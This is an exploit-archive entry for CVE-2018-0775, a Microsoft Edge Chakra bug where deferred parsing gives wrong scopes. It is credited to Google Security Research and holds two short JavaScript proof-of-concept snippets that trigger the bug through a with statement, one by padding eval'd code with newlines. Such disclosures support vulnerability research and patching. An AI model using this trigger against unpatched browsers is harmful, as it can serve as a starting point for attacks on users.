id: 29570
date: 01/17/2018
title: Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
author: Google Security Research
cves: CVE-2018-0775

/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to  issue 1310 .
 
PoC:
*/
 
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));
 
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());

#  0day.today [2023-03-26]  #